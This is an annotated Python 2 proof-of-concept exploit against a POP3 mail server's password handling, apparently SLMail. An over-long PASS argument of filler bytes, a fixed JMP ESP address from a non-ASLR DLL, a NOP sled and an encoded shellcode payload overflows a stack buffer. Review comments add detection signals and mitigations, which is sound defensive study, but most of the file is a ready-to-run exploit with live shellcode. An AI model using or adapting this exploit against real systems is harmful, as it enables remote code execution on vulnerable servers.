# Proof-of-concept client (Python 2 syntax, see the print statements) that
# talks POP3 to a server on the local machine and sends a PASS argument of
# several kilobytes: filler bytes, a fixed 4-byte address, padding and an
# encoded payload. The layout is that of a stack buffer overflow test against
# the server's password handling.
# Defender view: a PASS line this long, carrying non-printable bytes, is far
# outside any legitimate credential and is a usable detection signal for a
# network sensor or a protocol-aware proxy; the durable fix is a patched or
# replaced mail server, with DEP and ASLR enforced on the host.
# NOTE(review): the server product is not named on this page; the SLMFC.DLL
# reference below hints at the mail server that ships that library - confirm.
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IPv4 TCP client socket
- # \xff\xe4 - byte pair the author looked up in loaded modules (x86 encoding of JMP ESP)
- # Message= 0x5f4a358f : "\xff\xe4" | {PAGE_READONLY} [SLMFC.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v6.00.8063.0 (C:\Windows\system32\SLMFC.DLL)
# The tool output above records that SLMFC.DLL is loaded without ASLR, rebasing
# or SafeSEH, so the quoted address stays the same across restarts. That fixed
# address is what the hard-coded value in `eip` below relies on; modules built
# with ASLR remove that assumption.
- # \x00 \x0a \x0d - presumably the byte values kept out of the payload (NUL, LF, CR); LF and CR end a POP3 command line - confirm
# Opaque encoded payload bytes. What they do at run time cannot be determined
# from this listing; none of the three byte values listed above appears in it.
- buf = b""
- buf += b"\xdb\xd0\xbd\x7a\xaf\xcf\xbc\xd9\x74\x24\xf4\x58\x31"
- buf += b"\xc9\xb1\x56\x31\x68\x18\x03\x68\x18\x83\xe8\x86\x4d"
- buf += b"\x3a\x40\x9e\x10\xc5\xb9\x5e\x75\x4f\x5c\x6f\xb5\x2b"
- buf += b"\x14\xdf\x05\x3f\x78\xd3\xee\x6d\x69\x60\x82\xb9\x9e"
- buf += b"\xc1\x29\x9c\x91\xd2\x02\xdc\xb0\x50\x59\x31\x13\x69"
- buf += b"\x92\x44\x52\xae\xcf\xa5\x06\x67\x9b\x18\xb7\x0c\xd1"
- buf += b"\xa0\x3c\x5e\xf7\xa0\xa1\x16\xf6\x81\x77\x2d\xa1\x01"
- buf += b"\x79\xe2\xd9\x0b\x61\xe7\xe4\xc2\x1a\xd3\x93\xd4\xca"
- buf += b"\x2a\x5b\x7a\x33\x83\xae\x82\x73\x23\x51\xf1\x8d\x50"
- buf += b"\xec\x02\x4a\x2b\x2a\x86\x49\x8b\xb9\x30\xb6\x2a\x6d"
- buf += b"\xa6\x3d\x20\xda\xac\x1a\x24\xdd\x61\x11\x50\x56\x84"
- buf += b"\xf6\xd1\x2c\xa3\xd2\xba\xf7\xca\x43\x66\x59\xf2\x94"
- buf += b"\xc9\x06\x56\xde\xe7\x53\xeb\xbd\x6f\x97\xc6\x3d\x6f"
- buf += b"\xbf\x51\x4d\x5d\x60\xca\xd9\xed\xe9\xd4\x1e\x64\xfd"
- buf += b"\xe6\xf1\xce\x6e\x19\xf2\x2e\xa6\xde\xa6\x7e\xd0\xf7"
- buf += b"\xc6\x15\x20\xf7\x12\x83\x2a\x6f\x5d\xfb\xab\xe5\x35"
- buf += b"\xf9\xab\xe9\x24\x74\x4d\x59\xf7\xd6\xc2\x1a\xa7\x96"
- buf += b"\xb2\xf2\xad\x19\xec\xe3\xcd\xf0\x85\x8e\x21\xac\xfe"
- buf += b"\x26\xdb\xf5\x75\xd6\x24\x20\xf0\xd8\xaf\xc0\x04\x96"
- buf += b"\x47\xa1\x16\xcf\x3f\x49\xe7\x10\xaa\x49\x8d\x14\x7c"
- buf += b"\x1e\x39\x17\x59\x68\xe6\xe8\x8c\xeb\xe1\x17\x51\xdd"
- buf += b"\x9a\x2e\xc7\x61\xf5\x4e\x07\x61\x05\x19\x4d\x61\x6d"
- buf += b"\xfd\x35\x32\x88\x02\xe0\x27\x01\x97\x0b\x11\xf5\x30"
- buf += b"\x64\x9f\x20\x76\x2b\x60\x07\x04\x2c\x9e\xd5\x23\x95"
- buf += b"\xf6\x25\x74\x25\x06\x4c\x74\x75\x6e\x9b\x5b\x7a\x5e"
- buf += b"\x64\x76\xd3\xf6\xef\x17\x91\x67\xef\x3d\x77\x39\xf0"
- buf += b"\xb2\xac\xca\x8b\xbb\x53\x2b\x6c\xd2\x37\x2c\x6c\xda"
- buf += b"\x49\x11\xba\xe3\x3f\x54\x7e\x50\x4f\xe3\x23\xf1\xda"
- buf += b"\x0b\x77\x01\xcf"
- shellcode = buf  # second name for the same payload bytes
- nop = "\x90" * 16 # sixteen 0x90 bytes (x86 NOP) placed between the address and the payload
- eip = "\x8f\x35\x4a\x5f" # 0x5f4a358f written in little-endian byte order; matches the SLMFC.DLL address quoted above
# NOTE(review): 4654 is presumably the number of filler bytes needed to reach
# the saved return address in the server build the author tested; nothing on
# this page establishes that value. The name `buffer` also shadows the
# Python 2 builtin of the same name.
- buffer = '\x41' * 4654 + eip + nop + shellcode  # 'A' filler + address + padding + payload
- s.connect(('127.0.0.1', 110))  # loopback address, TCP port 110 (POP3)
- data = s.recv(1024)  # first server reply after connecting
- print data
- s.send('USER username' +'\r\n')  # ordinary-length USER command
- data = s.recv(1024)
- print data
- s.send('PASS ' + buffer + '\r\n')  # the over-long PASS argument; a server-side length check on this field is the missing control
- data = s.recv(1024)
- print data
- s.close()